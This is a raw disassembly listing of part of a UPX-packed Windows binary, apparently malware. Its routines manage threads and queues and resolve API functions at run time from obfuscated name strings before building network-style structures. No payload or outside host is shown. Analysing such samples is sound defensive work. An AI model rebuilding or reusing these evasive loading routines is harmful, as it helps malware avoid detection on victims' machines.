loc_4086B8: ; CODE XREF: UPX0:004086AD�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
loc_4086C0: ; DATA XREF: UPX0:off_42447C�o
push esi
mov esi, ecx
mov ecx, [esi+0Ch]
mov dword ptr [esi], offset off_42447C
mov dword ptr [esi+18h], 0
call sub_4073E0
mov eax, [esi+2Ch]
push eax
call sub_4198AE
mov ecx, [esi+0Ch]
add esp, 4
test ecx, ecx
jz short loc_4086F1
mov edx, [ecx]
push 1
call dword ptr [edx]
loc_4086F1: ; CODE XREF: UPX0:004086E9�j
mov ecx, [esi+4]
test ecx, ecx
jz short loc_4086FE
mov eax, [ecx]
push 1
call dword ptr [eax]
loc_4086FE: ; CODE XREF: UPX0:004086F6�j
test byte ptr [esp+8], 1
jz short loc_40870E
push esi
call sub_41930D
add esp, 4
loc_40870E: ; CODE XREF: UPX0:00408703�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408720 proc near ; CODE XREF: sub_404A20+9�p
; sub_409D80+C�p ...
push esi
mov esi, ecx
loc_408723: ; CODE XREF: sub_408720+E�j
push 0
mov ecx, esi
call sub_40C3D0
test eax, eax
jnz short loc_408723
pop esi
retn
sub_408720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408740 proc near ; CODE XREF: UPX0:00408763�p
; UPX0:00423015�j ...
push esi
mov dword ptr [ecx], offset off_42448C
lea esi, [ecx+4]
lea ebx, [ebx+0]
loc_408750: ; CODE XREF: sub_408740+1B�j
push 0
mov ecx, esi
call sub_40C3D0
test eax, eax
jnz short loc_408750
pop esi
retn
sub_408740 endp
; ---------------------------------------------------------------------------
align 10h
loc_408760: ; DATA XREF: UPX0:off_42448C�o
push esi
mov esi, ecx
call sub_408740
test byte ptr [esp+8], 1
jz short loc_408778
push esi
call sub_41930D
add esp, 4
loc_408778: ; CODE XREF: UPX0:0040876D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408780 proc near ; CODE XREF: sub_408A20+6C�p
; sub_411360+374�p
push esi
mov esi, ecx
push edi
lea ecx, [esi+2804h]
mov dword ptr [esi], offset off_424490
call sub_4082D0
xor edi, edi
mov [esi+2814h], edi
mov [esi+2818h], edi
mov [esi+281Ch], edi
mov dword ptr [esi+2820h], 40h
mov [esi+2824h], edi
mov dword ptr [esi+2810h], offset off_424484
call dword_4240E4 ; GetTickCount
mov [esi+282Ch], ax
mov [esi+2830h], di
mov [esi+2836h], di
mov [esi+2838h], di
mov [esi+283Ah], di
mov eax, 1
mov [esi+2834h], ax
mov [esi+2844h], edi
mov [esi+2848h], edi
mov [esi+284Ch], edi
mov [esi+2850h], edi
mov [esi+2858h], edi
mov [esi+2854h], eax
mov ecx, offset off_42448C
mov [esi+283Ch], ecx
mov [esi+2864h], edi
mov [esi+2868h], edi
mov [esi+286Ch], edi
mov [esi+2870h], edi
mov [esi+2878h], edi
mov [esi+2874h], eax
mov [esi+285Ch], ecx
mov [esi+2884h], edi
mov [esi+2888h], edi
mov [esi+288Ch], edi
mov [esi+2890h], edi
mov [esi+2898h], edi
mov [esi+2894h], eax
mov [esi+287Ch], ecx
mov [esi+28A4h], edi
mov [esi+28A8h], edi
mov [esi+28ACh], edi
mov [esi+28B0h], edi
mov [esi+28B8h], edi
mov [esi+28B4h], eax
mov [esi+289Ch], ecx
mov [esi+28C0h], edi
mov [esi+28C4h], edi
mov [esi+28C8h], edi
mov [esi+28CCh], edi
mov [esi+28D4h], edi
mov [esi+28D0h], eax
mov [esi+28D8h], edi
pop edi
mov eax, esi
pop esi
retn
sub_408780 endp
; ---------------------------------------------------------------------------
align 10h
loc_4088E0: ; DATA XREF: UPX0:off_424490�o
push esi
mov esi, ecx
call sub_408900
test byte ptr [esp+8], 1
jz short loc_4088F8
push esi
call sub_41930D
add esp, 4
loc_4088F8: ; CODE XREF: UPX0:004088ED�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408900 proc near ; CODE XREF: UPX0:004088E3�p
; sub_411360+6E2�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_408900
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ebp
push esi
mov esi, ecx
push edi
mov [esp+1Ch+var_10], esi
mov dword ptr [esi], offset off_424490
mov [esp+1Ch+var_4], 4
lea edi, [esi+28BCh]
xor ebp, ebp
loc_408935: ; CODE XREF: sub_408900+3F�j
push ebp
mov ecx, edi
call sub_408220
test eax, eax
jnz short loc_408935
push ebx
mov ebx, offset off_42448C
mov [esi+289Ch], ebx
lea edi, [esi+28A0h]
loc_408953: ; CODE XREF: sub_408900+5D�j
push ebp
mov ecx, edi
call sub_40C3D0
test eax, eax
jnz short loc_408953
mov byte ptr [esp+20h+var_4], 3
mov [esi+287Ch], ebx
lea edi, [esi+2880h]
loc_408970: ; CODE XREF: sub_408900+7A�j
push ebp
mov ecx, edi
call sub_40C3D0
test eax, eax
jnz short loc_408970
mov byte ptr [esp+20h+var_4], 2
mov [esi+285Ch], ebx
lea edi, [esi+2860h]
lea ecx, [ecx+0]
loc_408990: ; CODE XREF: sub_408900+9A�j
push ebp
mov ecx, edi
call sub_40C3D0
test eax, eax
jnz short loc_408990
mov [esi+283Ch], ebx
mov byte ptr [esp+20h+var_4], 1
lea edi, [esi+2840h]
pop ebx
mov edi, edi
loc_4089B0: ; CODE XREF: sub_408900+BA�j
push ebp
mov ecx, edi
call sub_40C3D0
test eax, eax
jnz short loc_4089B0
cmp [esi+2818h], ebp
mov dword ptr [esi+2810h], offset off_424478
jz short loc_4089DD
mov eax, [esi+2814h]
push eax
call sub_4198AE
add esp, 4
loc_4089DD: ; CODE XREF: sub_408900+CC�j
mov ecx, [esp+1Ch+var_C]
mov [esi+2814h], ebp
mov [esi+2818h], ebp
mov [esi+281Ch], ebp
mov [esi+2824h], ebp
mov dword ptr [esi+2820h], 40h
pop edi
mov dword ptr [esi+2804h], offset off_424474
pop esi
pop ebp
mov large fs:0, ecx
add esp, 10h
retn
sub_408900 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408A20 proc near ; CODE XREF: sub_40C480+C2�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_408A20
push eax
mov eax, [esp+0Ch+arg_0]
mov large fs:0, esp
push esi
mov esi, ecx
push 5Ch
mov dword ptr [esi], offset off_42447C
mov [esi+14h], eax
call sub_4191C1
add esp, 4
mov [esp+10h+arg_0], eax
test eax, eax
mov [esp+10h+var_4], 0
jz short loc_408A6C
mov ecx, [esi+14h]
push ecx
mov ecx, eax
call sub_406D00
jmp short loc_408A6E
; ---------------------------------------------------------------------------
loc_408A6C: ; CODE XREF: sub_408A20+3D�j
xor eax, eax
loc_408A6E: ; CODE XREF: sub_408A20+4A�j
push 28DCh
mov [esp+14h+var_4], 0FFFFFFFFh
mov [esi+0Ch], eax
call sub_4191C1
add esp, 4
test eax, eax
jz short loc_408A93
mov ecx, eax
call sub_408780
jmp short loc_408A95
; ---------------------------------------------------------------------------
loc_408A93: ; CODE XREF: sub_408A20+68�j
xor eax, eax
loc_408A95: ; CODE XREF: sub_408A20+71�j
mov ecx, [esp+10h+var_C]
mov [esi+4], eax
mov dword ptr [esi+18h], 0
mov dword ptr [esi+1Ch], 0
mov eax, esi
mov large fs:0, ecx
pop esi
add esp, 0Ch
retn 4
sub_408A20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408AC0 proc near ; CODE XREF: sub_40C7C0+B1�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov [ecx+2Ch], eax
retn 4
sub_408AC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408AD0 proc near ; CODE XREF: sub_40C950+16E�p
; sub_40C950+1A0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [ecx+0Ch]
test eax, eax
jnz short loc_408ADA
retn 8
; ---------------------------------------------------------------------------
loc_408ADA: ; CODE XREF: sub_408AD0+5�j
push esi
mov esi, [esp+4+arg_4]
mov edx, 1
cmp esi, edx
push edi
jl short loc_408AFC
mov edi, [ecx+10h]
lea esp, [esp+0]
loc_408AF0: ; CODE XREF: sub_408AD0+2A�j
cmp eax, edi
jz short loc_408B11
mov eax, [eax+4]
inc edx
cmp edx, esi
jle short loc_408AF0
loc_408AFC: ; CODE XREF: sub_408AD0+17�j
mov [ecx+18h], eax
mov eax, [eax]
mov ecx, [esp+8+arg_0]
pop edi
mov [ecx], eax
mov eax, 1
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_408B11: ; CODE XREF: sub_408AD0+22�j
pop edi
xor eax, eax
pop esi
retn 8
sub_408AD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408B20 proc near ; CODE XREF: sub_40C480+F2�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
push 0FFFFFFFFh
push offset SEH_408B20
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
mov esi, ecx
mov [esp+1Ch+var_14], esi
call sub_418F60
xor ebx, ebx
push 4
mov [esp+20h+var_4], ebx
mov dword ptr [esi], offset off_424494
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov byte ptr [esp+1Ch+var_4], 1
jz short loc_408B71
mov ecx, eax
call sub_4190C0
jmp short loc_408B73
; ---------------------------------------------------------------------------
loc_408B71: ; CODE XREF: sub_408B20+46�j
xor eax, eax
loc_408B73: ; CODE XREF: sub_408B20+4F�j
push 8
mov byte ptr [esp+20h+var_4], bl
mov [esi+18h], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov byte ptr [esp+1Ch+var_4], 2
jz short loc_408B9C
push 1
mov ecx, eax
call sub_419130
jmp short loc_408B9E
; ---------------------------------------------------------------------------
loc_408B9C: ; CODE XREF: sub_408B20+6F�j
xor eax, eax
loc_408B9E: ; CODE XREF: sub_408B20+7A�j
push 8
mov byte ptr [esp+20h+var_4], bl
mov [esi+1Ch], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov byte ptr [esp+1Ch+var_4], 3
jz short loc_408BC7
push 1
mov ecx, eax
call sub_419130
jmp short loc_408BC9
; ---------------------------------------------------------------------------
loc_408BC7: ; CODE XREF: sub_408B20+9A�j
xor eax, eax
loc_408BC9: ; CODE XREF: sub_408B20+A5�j
mov ecx, eax
mov byte ptr [esp+1Ch+var_4], bl
mov [esi+20h], eax
call sub_419180
mov eax, [esp+1Ch+arg_0]
push 1Ch
mov [esi+24h], eax
mov [esi+2Ch], ebx
mov [esi+28h], ebx
call sub_4191C1
add esp, 4
cmp eax, ebx
jz short loc_408C20
mov [eax+4], ebx
mov [eax+8], ebx
mov [eax+0Ch], ebx
mov [eax+10h], ebx
mov [eax+18h], ebx
mov dword ptr [eax+14h], 1
mov [esi+30h], eax
mov eax, esi
pop esi
pop ebx
mov ecx, [esp+14h+var_C]
mov large fs:0, ecx
add esp, 14h
retn 4
; ---------------------------------------------------------------------------
loc_408C20: ; CODE XREF: sub_408B20+D0�j
mov ecx, [esp+1Ch+var_C]
mov [esi+30h], ebx
mov eax, esi
pop esi
pop ebx
mov large fs:0, ecx
add esp, 14h
retn 4
sub_408B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C40 proc near ; DATA XREF: UPX0:00424498�o
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_408C40
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10Ch
mov eax, dword_42A290
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov ebx, ecx
push 0FFFFFFFEh
mov [ebp+var_14], eax
mov [ebp+var_118], ebx
mov [ebp+var_114], 0
call dword_4240A4 ; GetCurrentThread
push eax
call dword_4240A0 ; SetThreadPriority
push 0
call sub_419875
push eax
call sub_419846
add esp, 8
lea ebx, [ebx+0]
loc_408CA0: ; CODE XREF: sub_408C40+173�j
; sub_408C40+17D�j ...
mov ecx, [ebx+1Ch]
push 0
mov [ebp+var_4], 0
call sub_419160
mov ecx, [ebx+18h]
push 1
call sub_4190F0
mov ecx, [ebx+30h]
mov eax, [ecx+0Ch]
test eax, eax
jz short loc_408CFA
mov edx, 1
lea ebx, [ebx+0]
loc_408CD0: ; CODE XREF: sub_408C40+9D�j
test edx, edx
jg short loc_408CDF
cmp eax, [ecx+10h]
jz short loc_408CFA
mov eax, [eax+4]
inc edx
jmp short loc_408CD0
; ---------------------------------------------------------------------------
loc_408CDF: ; CODE XREF: sub_408C40+92�j
mov [ecx+18h], eax
mov eax, [eax]
test eax, eax
jz short loc_408CFA
mov ecx, eax
lea edx, [ebp+var_114]
loc_408CF0: ; CODE XREF: sub_408C40+B8�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_408CF0
loc_408CFA: ; CODE XREF: sub_408C40+83�j
; sub_408C40+97�j ...
mov ecx, [ebx+30h]
push 0
call sub_410EC0
mov eax, [ebx+30h]
mov eax, [eax+0Ch]
test eax, eax
jz short loc_408D1C
xor ecx, ecx
loc_408D10: ; CODE XREF: sub_408C40+1A9�j
test eax, eax
jnz loc_408DE5
test ecx, ecx
jnz short loc_408D24
loc_408D1C: ; CODE XREF: sub_408C40+CC�j
mov ecx, [ebx+1Ch]
call sub_419190
loc_408D24: ; CODE XREF: sub_408C40+DA�j
mov eax, [ebx+30h]
mov eax, [eax+0Ch]
test eax, eax
jz short loc_408D3D
xor ecx, ecx
loc_408D30: ; CODE XREF: sub_408C40+1A0�j
test eax, eax
jnz loc_408DDC
cmp ecx, 64h
jge short loc_408D45
loc_408D3D: ; CODE XREF: sub_408C40+EC�j
mov ecx, [ebx+20h]
call sub_419180
loc_408D45: ; CODE XREF: sub_408C40+FB�j
mov ecx, [ebx+18h]
call sub_419120
mov edi, offset byte_4243C3
lea esi, [ebp+var_114]
mov ecx, 1
xor eax, eax
repe cmpsb
jz short loc_408D92
lea ecx, [ebp+var_114]
push ecx
mov ecx, [ebx+2Ch]
mov byte ptr [ebp+var_4], 1
call sub_407F40
jmp short loc_408D84
; ---------------------------------------------------------------------------
loc_408D78: ; DATA XREF: UPX0:004265B8�o
mov eax, offset loc_408D7E
retn
; ---------------------------------------------------------------------------
loc_408D7E: ; DATA XREF: sub_408C40:loc_408D78�o
mov ebx, [ebp+var_118]
loc_408D84: ; CODE XREF: sub_408C40+136�j
mov [ebp+var_4], 0
mov [ebp+var_114], 0
loc_408D92: ; CODE XREF: sub_408C40+121�j
mov ecx, [ebx+30h]
mov eax, [ecx+10h]
test eax, eax
jz short loc_408DB8
mov edx, 1
loc_408DA1: ; CODE XREF: sub_408C40+16E�j
test edx, edx
jg short loc_408DB0
cmp eax, [ecx+0Ch]
jz short loc_408DB8
mov eax, [eax+8]
inc edx
jmp short loc_408DA1
; ---------------------------------------------------------------------------
loc_408DB0: ; CODE XREF: sub_408C40+163�j
mov [ecx+18h], eax
jmp loc_408CA0
; ---------------------------------------------------------------------------
loc_408DB8: ; CODE XREF: sub_408C40+15A�j
; sub_408C40+168�j
mov eax, [ebx+28h]
test eax, eax
jz loc_408CA0
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov ecx, [ebp+var_14]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_408DDC: ; CODE XREF: sub_408C40+F2�j
mov eax, [eax+4]
inc ecx
jmp loc_408D30
; ---------------------------------------------------------------------------
loc_408DE5: ; CODE XREF: sub_408C40+D2�j
mov eax, [eax+4]
inc ecx
jmp loc_408D10
sub_408C40 endp
; =============== S U B R O U T I N E =======================================
sub_408DEE proc near ; DATA XREF: UPX0:004265C8�o
mov esi, [ebp-118h]
mov ecx, [esi+18h]
mov byte ptr [ebp-114h], 0
call sub_419120
mov ecx, [esi+1Ch]
call sub_419180
mov eax, offset loc_408E11
retn
; ---------------------------------------------------------------------------
loc_408E11: ; DATA XREF: sub_408DEE+1D�o
mov ebx, [ebp-118h]
jmp loc_408CA0
sub_408DEE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408E20 proc near ; CODE XREF: sub_401D60+115�p
; sub_40ABB0+55�p ...
arg_0 = dword ptr 4
push ebx
push edi
mov edi, [esp+8+arg_0]
test edi, edi
mov ebx, ecx
jz short loc_408EA7
mov ecx, [ebx+20h]
push 0
call sub_419160
mov ecx, [ebx+18h]
push 1
call sub_4190F0
mov eax, edi
lea edx, [eax+1]
loc_408E45: ; CODE XREF: sub_408E20+2A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_408E45
sub eax, edx
inc eax
push esi
push eax
call sub_4191BC
mov esi, eax
add esp, 4
mov ecx, edi
sub esi, edi
nop
loc_408E60: ; CODE XREF: sub_408E20+48�j
mov dl, [ecx]
mov [esi+ecx], dl
inc ecx
test dl, dl
jnz short loc_408E60
mov ecx, [ebx+30h]
push 0
push eax
call sub_410740
mov eax, [ebx+30h]
mov eax, [eax+0Ch]
test eax, eax
pop esi
jz short loc_408E97
xor ecx, ecx
loc_408E82: ; CODE XREF: sub_408E20+68�j
mov eax, [eax+4]
inc ecx
test eax, eax
jnz short loc_408E82
cmp ecx, 64h
jl short loc_408E97
mov ecx, [ebx+20h]
call sub_419190
loc_408E97: ; CODE XREF: sub_408E20+5E�j
; sub_408E20+6D�j
mov ecx, [ebx+18h]
call sub_419120
mov ecx, [ebx+1Ch]
call sub_419180
loc_408EA7: ; CODE XREF: sub_408E20+A�j
pop edi
xor eax, eax
pop ebx
retn 4
sub_408E20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408EB0 proc near ; CODE XREF: sub_411AF0+13A�p
; UPX0:00422F76�j ...
push esi
mov esi, ecx
loc_408EB3: ; CODE XREF: sub_408EB0+E�j
push 0
mov ecx, esi
call sub_408220
test eax, eax
jnz short loc_408EB3
pop esi
retn
sub_408EB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408ED0 proc near ; CODE XREF: UPX0:00408FA3�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_408ED0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push esi
mov esi, ecx
push edi
mov [esp+18h+var_10], esi
mov dword ptr [esi], offset off_424494
mov eax, [esi+8]
push 0
push eax
mov [esp+20h+var_4], 0
call dword_424068 ; TerminateThread
mov edi, [esi+18h]
test edi, edi
jz short loc_408F1F
mov ecx, edi
call sub_4190E0
push edi
call sub_41930D
add esp, 4
loc_408F1F: ; CODE XREF: sub_408ED0+3D�j
mov edi, [esi+1Ch]
test edi, edi
jz short loc_408F36
mov ecx, edi
call sub_4190E0
push edi
call sub_41930D
add esp, 4
loc_408F36: ; CODE XREF: sub_408ED0+54�j
mov edi, [esi+20h]
test edi, edi
jz short loc_408F50
mov ecx, edi
call sub_4190E0
push edi
call sub_41930D
add esp, 4
lea ecx, [ecx+0]
loc_408F50: ; CODE XREF: sub_408ED0+6B�j
; sub_408ED0+8C�j
mov ecx, [esi+30h]
push 0
call sub_408220
test eax, eax
jnz short loc_408F50
mov edi, [esi+30h]
test edi, edi
jz short loc_408F7B
loc_408F65: ; CODE XREF: sub_408ED0+A0�j
push 0
mov ecx, edi
call sub_408220
test eax, eax
jnz short loc_408F65
push edi
call sub_41930D
add esp, 4
loc_408F7B: ; CODE XREF: sub_408ED0+93�j
mov ecx, esi
mov [esp+18h+var_4], 0FFFFFFFFh
call sub_418F90
mov ecx, [esp+18h+var_C]
pop edi
pop esi
mov large fs:0, ecx
add esp, 10h
retn
sub_408ED0 endp
; ---------------------------------------------------------------------------
align 10h
loc_408FA0: ; DATA XREF: UPX0:off_424494�o
push esi
mov esi, ecx
call sub_408ED0
test byte ptr [esp+8], 1
jz short loc_408FB8
push esi
call sub_41930D
add esp, 4
loc_408FB8: ; CODE XREF: UPX0:00408FAD�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408FC0 proc near ; CODE XREF: sub_409710+2B0�p
var_355 = byte ptr -355h
var_351 = byte ptr -351h
var_350 = byte ptr -350h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_320 = dword ptr -320h
var_31C = byte ptr -31Ch
var_30C = dword ptr -30Ch
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
sub esp, 358h
mov eax, dword_42A290
push ebx
push ebp
mov ebp, [esp+360h+arg_0]
xor ebx, ebx
cmp ebp, ebx
mov [esp+360h+var_4], eax
jz loc_4091B0
cmp [esp+360h+arg_4], ebx
jz loc_4091B0
push esi
push edi
xor eax, eax
mov [esp+368h+var_320], 94h
mov ecx, 24h
lea edi, [esp+368h+var_31C]
rep stosd
lea eax, [esp+368h+var_320]
push eax
mov [esp+36Ch+var_355], 1
call dword_424108 ; GetVersionExA
cmp [esp+364h+var_30C], 1
jnz short loc_40907E
push 0Bh
mov [esp+368h+var_351], bl
push (offset loc_42922B+1)
loc_40902B: ; CODE XREF: sub_408FC0+C5�j
mov ecx, offset off_42AE60
call sub_406AE0
push eax
call dword_424104 ; LoadLibraryA
mov esi, eax
cmp esi, ebx
jz short loc_409065
push 0Ch
push offset dword_429238
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call dword_424100 ; GetProcAddress
mov esi, eax
cmp esi, ebx
mov [esp+14h], esi
jnz short loc_409087
loc_409065: ; CODE XREF: sub_408FC0+80�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
mov ecx, [esp+358h+var_4]
call sub_4192B6
add esp, 358h
retn
; ---------------------------------------------------------------------------
loc_40907E: ; CODE XREF: sub_408FC0+5E�j
push 0Dh
push offset loc_42921C
jmp short loc_40902B
; ---------------------------------------------------------------------------
loc_409087: ; CODE XREF: sub_408FC0+A3�j
cmp [esp+368h+var_355], bl
jz loc_409147
mov eax, ebp
lea edx, [eax+1]
loc_409096: ; CODE XREF: sub_408FC0+DB�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_409096
mov esi, dword_4240FC
push 40h
sub eax, edx
lea ecx, [esp+36Ch+var_28C]
push ecx
inc eax
push eax
push ebp
push ebx
push ebx
call esi ; MultiByteToWideChar
mov edi, [esp+360h+arg_C]
mov eax, edi
lea ecx, [eax+1]
loc_4090C2: ; CODE XREF: sub_408FC0+107�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4090C2
push 104h
sub eax, ecx
lea edx, [esp+364h+var_204]
push edx
inc eax
push eax
push edi
push ebx
push ebx
call esi ; MultiByteToWideChar
lea eax, [esp+368h+var_28C]
mov [esp+368h+var_34C], eax
mov eax, 3E8h
lea edx, [esp+368h+var_350]
push edx
mov [esp+36Ch+var_33C], eax
mov [esp+36Ch+var_338], eax
lea eax, [esp+36Ch+var_34C]
push eax
push 2
lea ecx, [esp+374h+var_20C]
push ebx
mov [esp+378h+var_348], ebx
mov [esp+378h+var_344], ebx
mov [esp+378h+var_340], 7Fh
mov [esp+378h+var_334], ecx
mov [esp+378h+var_330], ebx
call dword ptr [esp+24h]
xor ecx, ecx
cmp eax, ebx
setz cl
pop edi
pop esi
pop ebp
pop ebx
mov eax, ecx
mov ecx, [esp+358h+var_4]
call sub_4192B6
add esp, 358h
retn
; ---------------------------------------------------------------------------
loc_409147: ; CODE XREF: sub_408FC0+CB�j
xor eax, eax
mov ecx, 0Bh
lea edi, [esp+368h+var_34C]
lea edx, [esp+368h+var_34C]
rep stosd
mov eax, ebp
sub edx, ebp
lea esp, [esp+0]
loc_409160: ; CODE XREF: sub_408FC0+1A8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_409160
mov ecx, [esp+368h+arg_4]
push 2Ch
lea edx, [esp+36Ch+var_34C]
push edx
push 32h
push ebx
mov byte ptr [esp+378h+var_340+1], bl
mov word ptr [esp+378h+var_340+2], 2
mov [esp+378h+var_33C], ebx
mov [esp+378h+var_338], ecx
call esi ; MultiByteToWideChar
xor ecx, ecx
cmp eax, ebx
setz cl
pop edi
pop esi
pop ebp
pop ebx
mov eax, ecx
mov ecx, [esp+358h+var_4]
call sub_4192B6
add esp, 358h
retn
; ---------------------------------------------------------------------------
loc_4091B0: ; CODE XREF: sub_408FC0+1F�j
; sub_408FC0+2C�j
mov ecx, [esp+360h+var_4]
pop ebp
xor eax, eax
pop ebx
call sub_4192B6
add esp, 358h
retn
sub_408FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4091D0 proc near ; CODE XREF: sub_409E30+13C�p
var_504 = dword ptr -504h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_4F8 = dword ptr -4F8h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = byte ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4D4 = dword ptr -4D4h
var_4D0 = byte ptr -4D0h
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_4A0 = word ptr -4A0h
var_49E = byte ptr -49Eh
var_39C = dword ptr -39Ch
var_398 = byte ptr -398h
var_388 = dword ptr -388h
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 504h
mov eax, dword_42A290
push ebx
push ebp
mov ebp, [esp+50Ch+arg_0]
xor ebx, ebx
cmp ebp, ebx
mov [esp+50Ch+var_4], eax
jz loc_4096B1
cmp [esp+50Ch+arg_4], ebx
jz loc_4096B1
push esi
push edi
xor eax, eax
mov [esp+514h+var_39C], 94h
mov ecx, 24h
lea edi, [esp+514h+var_398]
rep stosd
lea eax, [esp+514h+var_39C]
push eax
mov [esp+518h+var_4E4], ebx
mov [esp+518h+var_4F4], ebx
mov [esp+518h+var_500], ebx
mov [esp+518h+var_4F0], ebx
mov [esp+518h+var_4EC], ebx
mov [esp+518h+var_4CC], ebx
mov byte ptr [esp+518h+var_504+3], 1
call dword_424108 ; GetVersionExA
cmp [esp+510h+var_388], 1
jnz loc_4092E5
push 0Bh
mov byte ptr [esp+514h+var_500+3], bl
push (offset loc_4291DB+1)
loc_409263: ; CODE XREF: sub_4091D0+11C�j
mov ecx, offset off_42AE60
call sub_406AE0
push eax
call dword_424104 ; LoadLibraryA
mov esi, eax
cmp esi, ebx
jz short loc_4092CC
cmp byte ptr [esp+514h+var_504+3], bl
mov [esp+514h+var_4D8], ebx
mov [esp+514h+var_4DC], ebx
mov dword ptr [esp+514h+var_4D0], ebx
mov ecx, offset off_42AE60
push 0Dh
jz short loc_4092F1
push offset dword_4291E8
call sub_406AE0
mov edi, dword_424100
push eax
push esi
call edi ; GetProcAddress
cmp eax, ebx
mov [esp+514h+var_4DC], eax
jz short loc_4092CC
push 11h
push offset dword_4291F8
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call edi ; GetProcAddress
mov [esp+514h+var_4D8], eax
loc_4092C8: ; CODE XREF: sub_4091D0+137�j
cmp eax, ebx
jnz short loc_409309
loc_4092CC: ; CODE XREF: sub_4091D0+A8�j
; sub_4091D0+DD�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
mov ecx, [esp+504h+var_4]
call sub_4192B6
add esp, 504h
retn
; ---------------------------------------------------------------------------
loc_4092E5: ; CODE XREF: sub_4091D0+82�j
push 0Dh
push (offset loc_4291C8+4)
jmp loc_409263
; ---------------------------------------------------------------------------
loc_4092F1: ; CODE XREF: sub_4091D0+C1�j
push offset dword_42920C
call sub_406AE0
push eax
push esi
call dword_424100 ; GetProcAddress
mov dword ptr [esp+514h+var_4D0], eax
jmp short loc_4092C8
; ---------------------------------------------------------------------------
loc_409309: ; CODE XREF: sub_4091D0+FA�j
mov dl, byte_42449E
mov cx, word_42449C
mov eax, ebp
mov [esp+514h+var_49E], dl
mov [esp+514h+var_4A0], cx
mov edx, eax
loc_409323: ; CODE XREF: sub_4091D0+158�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_409323
lea edi, [esp+514h+var_4A0]
sub eax, edx
dec edi
loc_409331: ; CODE XREF: sub_4091D0+167�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_409331
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
mov al, byte ptr [esp+514h+var_504+3]
